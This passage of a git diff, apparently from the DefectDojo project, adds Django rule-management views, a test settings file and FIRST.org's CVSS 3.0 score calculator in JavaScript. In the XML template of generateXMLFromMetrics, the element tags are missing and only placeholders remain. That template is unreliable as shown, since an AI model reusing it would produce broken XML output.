json.dumps(field_dictionary)}) + + +@user_is_configuration_authorized('dojo.add_rule', 'superuser') +def add_child(request, pid): + rule = get_object_or_404(Rule, pk=pid) + if request.method == 'POST': + forms = RuleFormSet(request.POST) + for form in forms: + if form.is_valid(): + cr = form.save(commit=False) + cr.parent_rule = rule + cr.save() + messages.add_message(request, + messages.SUCCESS, + 'Rule created successfully.', + extra_tags='alert-success') + return HttpResponseRedirect(reverse('rules')) + form = RuleFormSet(queryset=Child_Rule.objects.filter(parent_rule=rule)) + add_breadcrumb(title="New Dojo Rule", top_level=False, request=request) + return render(request, 'dojo/new_rule.html', + {'form': form, + 'pid': pid, + 'finding_fields': finding_fields, + 'test_fields': test_fields, + 'engagement_fields': engagement_fields, + 'product_fields': product_fields, + 'product_type_fields': product_type_fields, + 'field_dictionary': json.dumps(field_dictionary)}) + + +@user_is_configuration_authorized('dojo.change_rule', 'superuser') +def edit_rule(request, pid): + pt = get_object_or_404(Rule, pk=pid) + children = Rule.objects.filter(parent_rule=pt) + all_rules = children | Rule.objects.filter(pk=pid) + form = RuleForm(instance=pt) + if request.method == 'POST': + form = RuleForm(request.POST, instance=pt) + if form.is_valid(): + pt = form.save() + messages.add_message(request, + messages.SUCCESS, + 'Rule updated successfully.', + extra_tags='alert-success') + if "_Add Child" in request.POST: + return HttpResponseRedirect(reverse('Add Child', args=(pt.id,))) + return HttpResponseRedirect(reverse('rules')) + add_breadcrumb(title="Edit Rule", top_level=False, request=request) + return render(request, 'dojo/edit_rule.html', { + 'name': 'Edit Rule', + 'metric': False, + 'user': request.user, + 'form': form, + 'field_dictionary': json.dumps(field_dictionary), + 'pt': pt, }) + + +@user_is_configuration_authorized('dojo.delete_rule', 'superuser') +def delete_rule(request, tid): + rule = get_object_or_404(Rule, pk=tid) + form = DeleteRuleForm(instance=rule) + + if request.method == 'POST': + # print('id' in request.POST, file=sys.stderr) + # print(str(rule.id) == request.POST['id'], file=sys.stderr) + # print(str(rule.id) == request.POST['id'], file=sys.stderr) + # if 'id' in request.POST and str(rule.id) == request.POST['id']: + form = DeleteRuleForm(request.POST, instance=rule) + # print(form.is_valid(), file=sys.stderr) + # print(form.errors, file=sys.stderr) + # print(form.non_field_errors(), file=sys.stderr) + # print('id' in request.POST, file=sys.stderr) + if form.is_valid(): + rule.delete() + messages.add_message(request, + messages.SUCCESS, + 'Rule deleted.', + extra_tags='alert-success') + return HttpResponseRedirect(reverse('rules')) + + collector = NestedObjects(using=DEFAULT_DB_ALIAS) + collector.collect([rule]) + rels = collector.nested() + + add_breadcrumb(parent=rule, title="Delete", top_level=False, request=request) + system_settings = System_Settings.objects.get() + return render(request, 'dojo/delete_rule.html', + {'rule': rule, + 'form': form, + 'active_tab': 'findings', + 'system_settings': system_settings, + 'rels': rels, + }) diff --git a/dojo/settings/unittest.py b/dojo/settings/unittest.py new file mode 100644 index 00000000000..3756a15d1c6 --- /dev/null +++ b/dojo/settings/unittest.py @@ -0,0 +1,14 @@ +# In order to run the unit tests, it is required to create a settings file +# first; +# Do so by copying the file dojo/settings/settings.dist.py to +# dojo/settings/settings.py; Otherwise, the following import will not work +from .settings import * + +DEBUG = True + +DATABASES = { + 'default': { + 'ENGINE': 'django.db.backends.sqlite3', + 'NAME': 'unittest.sqlite', + } +} diff --git a/dojo/static/dojo/img/favicon.ico b/dojo/static/dojo/img/favicon.ico new file mode 100644 index 00000000000..b94b12053d7 Binary files /dev/null and b/dojo/static/dojo/img/favicon.ico differ diff --git a/dojo/static/dojo/js/cvsscalc30.js b/dojo/static/dojo/js/cvsscalc30.js new file mode 100644 index 00000000000..84c7f3cf380 --- /dev/null +++ b/dojo/static/dojo/js/cvsscalc30.js @@ -0,0 +1,690 @@ +/* Copyright (c) 2015, FIRST.ORG, INC. + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without modification, are permitted provided that the + * following conditions are met: + * 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following + * disclaimer. + * 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the + * following disclaimer in the documentation and/or other materials provided with the distribution. + * 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote + * products derived from this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, + * INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, + * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, + * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ + +/* This JavaScript contains two main functions. Both take CVSS metric values and calculate CVSS scores for Base, + * Temporal and Environmental metric groups, their associated severity ratings, and an overall Vector String. + * + * Use CVSS.calculateCVSSFromMetrics if you wish to pass metric values as individual parameters. + * Use CVSS.calculateCVSSFromVector if you wish to pass metric values as a single Vector String. + * + * Changelog + * + * 2018-02-15 Darius Wiles Added a missing pair of parantheses in the Environmental score, specifically + * in the code setting envScore in the main clause (not the else clause). It was changed + * from "min (...), 10" to "min ((...), 10)". This correction does not alter any final + * Environmental scores. + * + * 2015-08-04 Darius Wiles Added CVSS.generateXMLFromMetrics and CVSS.generateXMLFromVector functions to return + * XML string representations of: a set of metric values; or a Vector String respectively. + * Moved all constants and functions to an object named "CVSS" to + * reduce the chance of conflicts in global variables when this file is combined with + * other JavaScript code. This will break all existing code that uses this file until + * the string "CVSS." is prepended to all references. The "Exploitability" metric has been + * renamed "Exploit Code Maturity" in the specification, so the same change has been made + * in the code in this file. + * + * 2015-04-24 Darius Wiles Environmental formula modified to eliminate undesirable behavior caused by subtle + * differences in rounding between Temporal and Environmental formulas that often + * caused the latter to be 0.1 lower than than the former when all Environmental + * metrics are "Not defined". Also added a RoundUp1 function to simplify formulas. + * + * 2015-04-09 Darius Wiles Added calculateCVSSFromVector function, license information, cleaned up code and improved + * comments. + * + * 2014-12-12 Darius Wiles Initial release for CVSS 3.0 Preview 2. + */ + +// Constants used in the formula. They are not declared as "const" to avoid problems in older browsers. + +var CVSS = {}; + +CVSS.CVSSVersionIdentifier = "CVSS:3.0"; +CVSS.exploitabilityCoefficient = 8.22; +CVSS.scopeCoefficient = 1.08; + +// A regular expression to validate that a CVSS 3.0 vector string is well formed. It checks metrics and metric +// values. It does not check that a metric is specified more than once and it does not check that all base +// metrics are present. These checks need to be performed separately. + +CVSS.vectorStringRegex_30 = /^CVSS:3\.0\/((AV:[NALP]|AC:[LH]|PR:[UNLH]|UI:[NR]|S:[UC]|[CIA]:[NLH]|E:[XUPFH]|RL:[XOTWU]|RC:[XURC]|[CIA]R:[XLMH]|MAV:[XNALP]|MAC:[XLH]|MPR:[XUNLH]|MUI:[XNR]|MS:[XUC]|M[CIA]:[XNLH])\/)*(AV:[NALP]|AC:[LH]|PR:[UNLH]|UI:[NR]|S:[UC]|[CIA]:[NLH]|E:[XUPFH]|RL:[XOTWU]|RC:[XURC]|[CIA]R:[XLMH]|MAV:[XNALP]|MAC:[XLH]|MPR:[XUNLH]|MUI:[XNR]|MS:[XUC]|M[CIA]:[XNLH])$/; + + +// Associative arrays mapping each metric value to the constant defined in the CVSS scoring formula in the CVSS v3.0 +// specification. + +CVSS.Weight = { + AV: { N: 0.85, A: 0.62, L: 0.55, P: 0.2}, + AC: { H: 0.44, L: 0.77}, + PR: { U: {N: 0.85, L: 0.62, H: 0.27}, // These values are used if Scope is Unchanged + C: {N: 0.85, L: 0.68, H: 0.5}}, // These values are used if Scope is Changed + UI: { N: 0.85, R: 0.62}, + S: { U: 6.42, C: 7.52}, // Note: not defined as constants in specification + CIA: { N: 0, L: 0.22, H: 0.56}, // C, I and A have the same weights + + E: { X: 1, U: 0.91, P: 0.94, F: 0.97, H: 1}, + RL: { X: 1, O: 0.95, T: 0.96, W: 0.97, U: 1}, + RC: { X: 1, U: 0.92, R: 0.96, C: 1}, + + CIAR: { X: 1, L: 0.5, M: 1, H: 1.5} // CR, IR and AR have the same weights +}; + + +// Severity rating bands, as defined in the CVSS v3.0 specification. + +CVSS.severityRatings = [ { name: "None", bottom: 0.0, top: 0.0}, + { name: "Low", bottom: 0.1, top: 3.9}, + { name: "Medium", bottom: 4.0, top: 6.9}, + { name: "High", bottom: 7.0, top: 8.9}, + { name: "Critical", bottom: 9.0, top: 10.0} ]; + + + + +/* ** CVSS.calculateCVSSFromMetrics ** + * + * Takes Base, Temporal and Environmental metric values as individual parameters. Their values are in the short format + * defined in the CVSS v3.0 standard definition of the Vector String. For example, the AttackComplexity parameter + * should be either "H" or "L". + * + * Returns Base, Temporal and Environmental scores, severity ratings, and an overall Vector String. All Base metrics + * are required to generate this output. All Temporal and Environmental metric values are optional. Any that are not + * passed default to "X" ("Not Defined"). + * + * The output is an object which always has a property named "success". + * + * If no errors are encountered, success is Boolean "true", and the following other properties are defined containing + * scores, severities and a vector string: + * baseMetricScore, baseSeverity, + * temporalMetricScore, temporalSeverity, + * environmentalMetricScore, environmentalSeverity, + * vectorString + * + * If errors are encountered, success is Boolean "false", and the following other properties are defined: + * errorType - a string indicating the error. Either: + * "MissingBaseMetric", if at least one Base metric has not been defined; or + * "UnknownMetricValue", if at least one metric value is invalid. + * errorMetrics - an array of strings representing the metrics at fault. The strings are abbreviated versions of the + * metrics, as defined in the CVSS v3.0 standard definition of the Vector String. + */ +CVSS.calculateCVSSFromMetrics = function ( + AttackVector, AttackComplexity, PrivilegesRequired, UserInteraction, Scope, Confidentiality, Integrity, Availability, + ExploitCodeMaturity, RemediationLevel, ReportConfidence, + ConfidentialityRequirement, IntegrityRequirement, AvailabilityRequirement, + ModifiedAttackVector, ModifiedAttackComplexity, ModifiedPrivilegesRequired, ModifiedUserInteraction, ModifiedScope, + ModifiedConfidentiality, ModifiedIntegrity, ModifiedAvailability) { + + // If input validation fails, this array is populated with strings indicating which metrics failed validation. + var badMetrics = []; + + // ENSURE ALL BASE METRICS ARE DEFINED + // + // We need values for all Base Score metrics to calculate scores. + // If any Base Score parameters are undefined, create an array of missing metrics and return it with an error. + + if (typeof AttackVector === "undefined" || AttackVector === "") { badMetrics.push("AV"); } + if (typeof AttackComplexity === "undefined" || AttackComplexity === "") { badMetrics.push("AC"); } + if (typeof PrivilegesRequired === "undefined" || PrivilegesRequired === "") { badMetrics.push("PR"); } + if (typeof UserInteraction === "undefined" || UserInteraction === "") { badMetrics.push("UI"); } + if (typeof Scope === "undefined" || Scope === "") { badMetrics.push("S"); } + if (typeof Confidentiality === "undefined" || Confidentiality === "") { badMetrics.push("C"); } + if (typeof Integrity === "undefined" || Integrity === "") { badMetrics.push("I"); } + if (typeof Availability === "undefined" || Availability === "") { badMetrics.push("A"); } + + if (badMetrics.length > 0) { + return { success: false, errorType: "MissingBaseMetric", errorMetrics: badMetrics }; + } + + + // STORE THE METRIC VALUES THAT WERE PASSED AS PARAMETERS + // + // Temporal and Environmental metrics are optional, so set them to "X" ("Not Defined") if no value was passed. + + var AV = AttackVector; + var AC = AttackComplexity; + var PR = PrivilegesRequired; + var UI = UserInteraction; + var S = Scope; + var C = Confidentiality; + var I = Integrity; + var A = Availability; + + var E = ExploitCodeMaturity || "X"; + var RL = RemediationLevel || "X"; + var RC = ReportConfidence || "X"; + + var CR = ConfidentialityRequirement || "X"; + var IR = IntegrityRequirement || "X"; + var AR = AvailabilityRequirement || "X"; + var MAV = ModifiedAttackVector || "X"; + var MAC = ModifiedAttackComplexity || "X"; + var MPR = ModifiedPrivilegesRequired || "X"; + var MUI = ModifiedUserInteraction || "X"; + var MS = ModifiedScope || "X"; + var MC = ModifiedConfidentiality || "X"; + var MI = ModifiedIntegrity || "X"; + var MA = ModifiedAvailability || "X"; + + + // CHECK VALIDITY OF METRIC VALUES + // + // Use the Weight object to ensure that, for every metric, the metric value passed is valid. + // If any invalid values are found, create an array of their metrics and return it with an error. + // + // The Privileges Required (PR) weight depends on Scope, but when checking the validity of PR we must not assume + // that the given value for Scope is valid. We therefore always look at the weights for Unchanged Scope when + // performing this check. The same applies for validation of Modified Privileges Required (MPR). + // + // The Weights object does not contain "X" ("Not Defined") values for Environmental metrics because we replace them + // with their Base metric equivalents later in the function. For example, an MAV of "X" will be replaced with the + // value given for AV. We therefore need to explicitly allow a value of "X" for Environmental metrics. + + if (!CVSS.Weight.AV.hasOwnProperty(AV)) { badMetrics.push("AV"); } + if (!CVSS.Weight.AC.hasOwnProperty(AC)) { badMetrics.push("AC"); } + if (!CVSS.Weight.PR.U.hasOwnProperty(PR)) { badMetrics.push("PR"); } + if (!CVSS.Weight.UI.hasOwnProperty(UI)) { badMetrics.push("UI"); } + if (!CVSS.Weight.S.hasOwnProperty(S)) { badMetrics.push("S"); } + if (!CVSS.Weight.CIA.hasOwnProperty(C)) { badMetrics.push("C"); } + if (!CVSS.Weight.CIA.hasOwnProperty(I)) { badMetrics.push("I"); } + if (!CVSS.Weight.CIA.hasOwnProperty(A)) { badMetrics.push("A"); } + + if (!CVSS.Weight.E.hasOwnProperty(E)) { badMetrics.push("E"); } + if (!CVSS.Weight.RL.hasOwnProperty(RL)) { badMetrics.push("RL"); } + if (!CVSS.Weight.RC.hasOwnProperty(RC)) { badMetrics.push("RC"); } + + if (!(CR === "X" || CVSS.Weight.CIAR.hasOwnProperty(CR))) { badMetrics.push("CR"); } + if (!(IR === "X" || CVSS.Weight.CIAR.hasOwnProperty(IR))) { badMetrics.push("IR"); } + if (!(AR === "X" || CVSS.Weight.CIAR.hasOwnProperty(AR))) { badMetrics.push("AR"); } + if (!(MAV === "X" || CVSS.Weight.AV.hasOwnProperty(MAV))) { badMetrics.push("MAV"); } + if (!(MAC === "X" || CVSS.Weight.AC.hasOwnProperty(MAC))) { badMetrics.push("MAC"); } + if (!(MPR === "X" || CVSS.Weight.PR.U.hasOwnProperty(MPR))) { badMetrics.push("MPR"); } + if (!(MUI === "X" || CVSS.Weight.UI.hasOwnProperty(MUI))) { badMetrics.push("MUI"); } + if (!(MS === "X" || CVSS.Weight.S.hasOwnProperty(MS))) { badMetrics.push("MS"); } + if (!(MC === "X" || CVSS.Weight.CIA.hasOwnProperty(MC))) { badMetrics.push("MC"); } + if (!(MI === "X" || CVSS.Weight.CIA.hasOwnProperty(MI))) { badMetrics.push("MI"); } + if (!(MA === "X" || CVSS.Weight.CIA.hasOwnProperty(MA))) { badMetrics.push("MA"); } + + if (badMetrics.length > 0) { + return { success: false, errorType: "UnknownMetricValue", errorMetrics: badMetrics }; + } + + + + // GATHER WEIGHTS FOR ALL METRICS + + var metricWeightAV = CVSS.Weight.AV [AV]; + var metricWeightAC = CVSS.Weight.AC [AC]; + var metricWeightPR = CVSS.Weight.PR [S][PR]; // PR depends on the value of Scope (S). + var metricWeightUI = CVSS.Weight.UI [UI]; + var metricWeightS = CVSS.Weight.S [S]; + var metricWeightC = CVSS.Weight.CIA [C]; + var metricWeightI = CVSS.Weight.CIA [I]; + var metricWeightA = CVSS.Weight.CIA [A]; + + var metricWeightE = CVSS.Weight.E [E]; + var metricWeightRL = CVSS.Weight.RL [RL]; + var metricWeightRC = CVSS.Weight.RC [RC]; + + // For metrics that are modified versions of Base Score metrics, e.g. Modified Attack Vector, use the value of + // the Base Score metric if the modified version value is "X" ("Not Defined"). + var metricWeightCR = CVSS.Weight.CIAR [CR]; + var metricWeightIR = CVSS.Weight.CIAR [IR]; + var metricWeightAR = CVSS.Weight.CIAR [AR]; + var metricWeightMAV = CVSS.Weight.AV [MAV !== "X" ? MAV : AV]; + var metricWeightMAC = CVSS.Weight.AC [MAC !== "X" ? MAC : AC]; + var metricWeightMPR = CVSS.Weight.PR [MS !== "X" ? MS : S] [MPR !== "X" ? MPR : PR]; // Depends on MS. + var metricWeightMUI = CVSS.Weight.UI [MUI !== "X" ? MUI : UI]; + var metricWeightMS = CVSS.Weight.S [MS !== "X" ? MS : S]; + var metricWeightMC = CVSS.Weight.CIA [MC !== "X" ? MC : C]; + var metricWeightMI = CVSS.Weight.CIA [MI !== "X" ? MI : I]; + var metricWeightMA = CVSS.Weight.CIA [MA !== "X" ? MA : A]; + + + + // CALCULATE THE CVSS BASE SCORE + + var baseScore; + var impactSubScore; + var exploitabalitySubScore = CVSS.exploitabilityCoefficient * metricWeightAV * metricWeightAC * metricWeightPR * metricWeightUI; + var impactSubScoreMultiplier = (1 - ((1 - metricWeightC) * (1 - metricWeightI) * (1 - metricWeightA))); + + if (S === 'U') { + impactSubScore = metricWeightS * impactSubScoreMultiplier; + } else { + impactSubScore = metricWeightS * (impactSubScoreMultiplier - 0.029) - 3.25 * Math.pow(impactSubScoreMultiplier - 0.02, 15); + } + + if (impactSubScore <= 0) { + baseScore = 0; + } else { + if (S === 'U') { + baseScore = CVSS.roundUp1(Math.min((exploitabalitySubScore + impactSubScore), 10)); + } else { + baseScore = CVSS.roundUp1(Math.min((exploitabalitySubScore + impactSubScore) * CVSS.scopeCoefficient, 10)); + } + } + + + + // CALCULATE THE CVSS TEMPORAL SCORE + + var temporalScore = CVSS.roundUp1(baseScore * metricWeightE * metricWeightRL * metricWeightRC); + + + // CALCULATE THE CVSS ENVIRONMENTAL SCORE + // + // - envExploitabalitySubScore recalculates the Base Score Exploitability sub-score using any modified values from the + // Environmental metrics group in place of the values specified in the Base Score, if any have been defined. + // - envAdjustedImpactSubScore recalculates the Base Score Impact sub-score using any modified values from the + // Environmental metrics group in place of the values specified in the Base Score, and any additional weightings + // given in the Environmental metrics group. + + var envScore; + var envModifiedImpactSubScore; + var envModifiedExploitabalitySubScore = CVSS.exploitabilityCoefficient * metricWeightMAV * metricWeightMAC * metricWeightMPR * metricWeightMUI; + + var envImpactSubScoreMultiplier = Math.min (1 - ( + (1 - metricWeightMC * metricWeightCR) * + (1 - metricWeightMI * metricWeightIR) * + (1 - metricWeightMA * metricWeightAR)), 0.915); + + if (MS === "U" || + (MS === "X" && S === "U")) { + envModifiedImpactSubScore = metricWeightMS * envImpactSubScoreMultiplier; + envScore = CVSS.roundUp1(CVSS.roundUp1(Math.min((envModifiedImpactSubScore + envModifiedExploitabalitySubScore), 10)) * + metricWeightE * metricWeightRL * metricWeightRC); + } else { + envModifiedImpactSubScore = metricWeightMS * (envImpactSubScoreMultiplier - 0.029) - 3.25 * Math.pow(envImpactSubScoreMultiplier - 0.02, 15); + envScore = CVSS.roundUp1(CVSS.roundUp1(Math.min(CVSS.scopeCoefficient * (envModifiedImpactSubScore + envModifiedExploitabalitySubScore), 10)) * + metricWeightE * metricWeightRL * metricWeightRC); + } + + if (envModifiedImpactSubScore <= 0) { + envScore = 0; + } + + + // CONSTRUCT THE VECTOR STRING + + var vectorString = + CVSS.CVSSVersionIdentifier + + "/AV:" + AV + + "/AC:" + AC + + "/PR:" + PR + + "/UI:" + UI + + "/S:" + S + + "/C:" + C + + "/I:" + I + + "/A:" + A; + + if (E !== "X") {vectorString = vectorString + "/E:" + E;} + if (RL !== "X") {vectorString = vectorString + "/RL:" + RL;} + if (RC !== "X") {vectorString = vectorString + "/RC:" + RC;} + + if (CR !== "X") {vectorString = vectorString + "/CR:" + CR;} + if (IR !== "X") {vectorString = vectorString + "/IR:" + IR;} + if (AR !== "X") {vectorString = vectorString + "/AR:" + AR;} + if (MAV !== "X") {vectorString = vectorString + "/MAV:" + MAV;} + if (MAC !== "X") {vectorString = vectorString + "/MAC:" + MAC;} + if (MPR !== "X") {vectorString = vectorString + "/MPR:" + MPR;} + if (MUI !== "X") {vectorString = vectorString + "/MUI:" + MUI;} + if (MS !== "X") {vectorString = vectorString + "/MS:" + MS;} + if (MC !== "X") {vectorString = vectorString + "/MC:" + MC;} + if (MI !== "X") {vectorString = vectorString + "/MI:" + MI;} + if (MA !== "X") {vectorString = vectorString + "/MA:" + MA;} + + + // Return an object containing the scores for all three metric groups, and an overall vector string. + + return { + success: true, + baseMetricScore: baseScore.toFixed(1), + baseSeverity: CVSS.severityRating( baseScore.toFixed(1) ), + + temporalMetricScore: temporalScore.toFixed(1), + temporalSeverity: CVSS.severityRating( temporalScore.toFixed(1) ), + + environmentalMetricScore: envScore.toFixed(1), + environmentalSeverity: CVSS.severityRating( envScore.toFixed(1) ), + + vectorString: vectorString + }; +}; + + + + +/* ** CVSS.calculateCVSSFromVector ** + * + * Takes Base, Temporal and Environmental metric values as a single string in the Vector String format defined + * in the CVSS v3.0 standard definition of the Vector String. + * + * Returns Base, Temporal and Environmental scores, severity ratings, and an overall Vector String. All Base metrics + * are required to generate this output. All Temporal and Environmental metric values are optional. Any that are not + * passed default to "X" ("Not Defined"). + * + * See the comment for the CVSS.calculateCVSSFromMetrics function for details on the function output. In addition to + * the error conditions listed for that function, this function can also return: + * "MalformedVectorString", if the Vector String passed is does not conform to the format in the standard; or + * "MultipleDefinitionsOfMetric", if the Vector String is well formed but defines the same metric (or metrics), + * more than once. + */ +CVSS.calculateCVSSFromVector = function ( vectorString ) { + + var metricValues = { + AV: undefined, AC: undefined, PR: undefined, UI: undefined, S: undefined, + C: undefined, I: undefined, A: undefined, + E: undefined, RL: undefined, RC: undefined, + CR: undefined, IR: undefined, AR: undefined, + MAV: undefined, MAC: undefined, MPR: undefined, MUI: undefined, MS: undefined, + MC: undefined, MI: undefined, MA: undefined + }; + + // If input validation fails, this array is populated with strings indicating which metrics failed validation. + var badMetrics = []; + + if (!CVSS.vectorStringRegex_30.test(vectorString)) { + return { success: false, errorType: "MalformedVectorString" }; + } + + var metricNameValue = vectorString.substring(CVSS.CVSSVersionIdentifier.length).split("/"); + + for (var i in metricNameValue) { + if (metricNameValue.hasOwnProperty(i)) { + + var singleMetric = metricNameValue[i].split(":"); + + if (typeof metricValues[singleMetric[0]] === "undefined") { + metricValues[singleMetric[0]] = singleMetric[1]; + } else { + badMetrics.push(singleMetric[0]); + } + } + } + + if (badMetrics.length > 0) { + return { success: false, errorType: "MultipleDefinitionsOfMetric", errorMetrics: badMetrics }; + } + + return CVSS.calculateCVSSFromMetrics ( + metricValues.AV, metricValues.AC, metricValues.PR, metricValues.UI, metricValues.S, + metricValues.C, metricValues.I, metricValues.A, + metricValues.E, metricValues.RL, metricValues.RC, + metricValues.CR, metricValues.IR, metricValues.AR, + metricValues.MAV, metricValues.MAC, metricValues.MPR, metricValues.MUI, metricValues.MS, + metricValues.MC, metricValues.MI, metricValues.MA); +}; + + + + +/* ** CVSS.roundUp1 ** + * + * Rounds up the number passed as a parameter to 1 decimal place and returns the result. + * + * Standard JavaScript errors thrown when arithmetic operations are performed on non-numbers will be returned if the + * given input is not a number. + */ +CVSS.roundUp1 = function (d) { + return Math.ceil (d * 10) / 10; +}; + + + + +/* ** CVSS.severityRating ** + * + * Given a CVSS score, returns the name of the severity rating as defined in the CVSS standard. + * The input needs to be a number between 0.0 to 10.0, to one decimal place of precision. + * + * The following error values may be returned instead of a severity rating name: + * NaN (JavaScript "Not a Number") - if the input is not a number. + * undefined - if the input is a number that is not within the range of any defined severity rating. + */ +CVSS.severityRating = function (score) { + var severityRatingLength = CVSS.severityRatings.length; + + var validatedScore = Number(score); + + if (isNaN(validatedScore)) { + return validatedScore; + } + + for (var i = 0; i < severityRatingLength; i++) { + if (score >= CVSS.severityRatings[i].bottom && score <= CVSS.severityRatings[i].top) { + return CVSS.severityRatings[i].name; + } + } + + return undefined; +}; + + + +/////////////////////////////////////////////////////////////////////////// +// DATA AND FUNCTIONS FOR CREATING AN XML REPRESENTATION OF A CVSS SCORE // +/////////////////////////////////////////////////////////////////////////// + +// A mapping between abbreviated metric values and the string used in the XML representation. +// For example, a Remediation Level (RL) abbreviated metric value of "W" maps to "WORKAROUND". +// For brevity, Base metric values their modified equivalents in the Environmental metric group. We can do this +// because the latter is the same as the former, except it also includes a "NOT_DEFINED" value. + +CVSS.XML_MetricNames = { + E: { X: "NOT_DEFINED", U: "UNPROVEN", P: "PROOF_OF_CONCEPT", F: "FUNCTIONAL", H: "HIGH"}, + RL: { X: "NOT_DEFINED", O: "OFFICIAL_FIX", T: "TEMPORARY_FIX", W: "WORKAROUND", U: "UNAVAILABLE"}, + RC: { X: "NOT_DEFINED", U: "UNKNOWN", R: "REASONABLE", C: "CONFIRMED"}, + + CIAR: { X: "NOT_DEFINED", L: "LOW", M: "MEDIUM", H: "HIGH"}, // CR, IR and AR use the same metric names + MAV: { N: "NETWORK", A: "ADJACENT_NETWORK", L: "LOCAL", P: "PHYSICAL", X: "NOT_DEFINED" }, + MAC: { H: "HIGH", L: "LOW", X: "NOT_DEFINED" }, + MPR: { N: "NONE", L: "LOW", H: "HIGH", X: "NOT_DEFINED" }, + MUI: { N: "NONE", R: "REQUIRED", X: "NOT_DEFINED" }, + MS: { U: "UNCHANGED", C: "CHANGED", X: "NOT_DEFINED" }, + MCIA: { N: "NONE", L: "LOW", H: "HIGH", X: "NOT_DEFINED" } // C, I and A use the same metric names +}; + + + +/* ** CVSS.generateXMLFromMetrics ** + * + * Takes Base, Temporal and Environmental metric values as individual parameters. Their values are in the short format + * defined in the CVSS v3.0 standard definition of the Vector String. For example, the AttackComplexity parameter + * should be either "H" or "L". + * + * Returns a single string containing the metric values in XML form. All Base metrics are required to generate this + * output. All Temporal and Environmental metric values are optional. Any that are not passed will be represented in + * the XML as NOT_DEFINED. The function returns a string for simplicity. It is arguably better to return the XML as + * a DOM object, but at the time of writing this leads to complexity due to older browsers using different JavaScript + * interfaces to do this. Also for simplicity, all Temporal and Environmental metrics are include in the string, + * even though those with a value of "Not Defined" do not need to be included. + * + * The output of this function is an object which always has a property named "success". + * + * If no errors are encountered, success is Boolean "true", and the "xmlString" property contains the XML string + * representation. + * + * If errors are encountered, success is Boolean "false", and other properties are defined as per the + * CVSS.calculateCVSSFromMetrics function. Refer to the comment for that function for more details. + */ +CVSS.generateXMLFromMetrics = function ( + AttackVector, AttackComplexity, PrivilegesRequired, UserInteraction, Scope, Confidentiality, Integrity, Availability, + ExploitCodeMaturity, RemediationLevel, ReportConfidence, + ConfidentialityRequirement, IntegrityRequirement, AvailabilityRequirement, + ModifiedAttackVector, ModifiedAttackComplexity, ModifiedPrivilegesRequired, ModifiedUserInteraction, ModifiedScope, + ModifiedConfidentiality, ModifiedIntegrity, ModifiedAvailability) { + + // A string containing the XML we wish to output, with placeholders for the CVSS metrics we will substitute for + // their values, based on the inputs passed to this function. + var xmlTemplate = + '\n' + + '\n' + + '\n' + + ' \n' + + ' __AttackVector__\n' + + ' __AttackComplexity__\n' + + ' __PrivilegesRequired__\n' + + ' __UserInteraction__\n' + + ' __Scope__\n' + + ' __Confidentiality__\n' + + ' __Integrity__\n' + + ' __Availability__\n' + + ' __BaseScore__\n' + + ' __BaseSeverityRating__\n' + + ' \n' + + '\n' + + ' \n' + + ' __ExploitCodeMaturity__\n' + + ' __RemediationLevel__\n' + + ' __ReportConfidence__\n' + + ' __TemporalScore__\n' + + ' __TemporalSeverityRating__\n' + + ' \n' + + '\n' + + ' \n' + + ' __ConfidentialityRequirement__\n' + + ' __IntegrityRequirement__\n' + + ' __AvailabilityRequirement__\n' + + ' __ModifiedAttackVector__\n' + + ' __ModifiedAttackComplexity__\n' + + ' __ModifiedPrivilegesRequired__\n' + + ' __ModifiedUserInteraction__\n' + + ' __ModifiedScope__\n' + + ' __ModifiedConfidentiality__\n' + + ' __ModifiedIntegrity__\n' + + ' __ModifiedAvailability__\n' + + ' __EnvironmentalScore__\n' + + ' __EnvironmentalSeverityRating__\n' + + ' \n' + + '\n' + + '\n'; + + + // Call CVSS.calculateCVSSFromMetrics to validate all the parameters and generate scores and severity ratings. + // If that function returns an error, immediately return it to the caller of this function. + var result = CVSS.calculateCVSSFromMetrics ( + AttackVector, AttackComplexity, PrivilegesRequired, UserInteraction, Scope, Confidentiality, Integrity, Availability, + ExploitCodeMaturity, RemediationLevel, ReportConfidence, + ConfidentialityRequirement, IntegrityRequirement, AvailabilityRequirement, + ModifiedAttackVector, ModifiedAttackComplexity, ModifiedPrivilegesRequired, ModifiedUserInteraction, ModifiedScope, + ModifiedConfidentiality, ModifiedIntegrity, ModifiedAvailability); + + if (result.success !== true) { + return result; + } + + var xmlOutput = xmlTemplate; + xmlOutput = xmlOutput.replace ("__AttackVector__", CVSS.XML_MetricNames["MAV"][AttackVector]); + xmlOutput = xmlOutput.replace ("__AttackComplexity__", CVSS.XML_MetricNames["MAC"][AttackComplexity]); + xmlOutput = xmlOutput.replace ("__PrivilegesRequired__", CVSS.XML_MetricNames["MPR"][PrivilegesRequired]); + xmlOutput = xmlOutput.replace ("__UserInteraction__", CVSS.XML_MetricNames["MUI"][UserInteraction]); + xmlOutput = xmlOutput.replace ("__Scope__", CVSS.XML_MetricNames["MS"][Scope]); + xmlOutput = xmlOutput.replace ("__Confidentiality__", CVSS.XML_MetricNames["MCIA"][Confidentiality]); + xmlOutput = xmlOutput.replace ("__Integrity__", CVSS.XML_MetricNames["MCIA"][Integrity]); + xmlOutput = xmlOutput.replace ("__Availability__", CVSS.XML_MetricNames["MCIA"][Availability]); + xmlOutput = xmlOutput.replace ("__BaseScore__", result.baseMetricScore); + xmlOutput = xmlOutput.replace ("__BaseSeverityRating__", result.baseSeverity); + 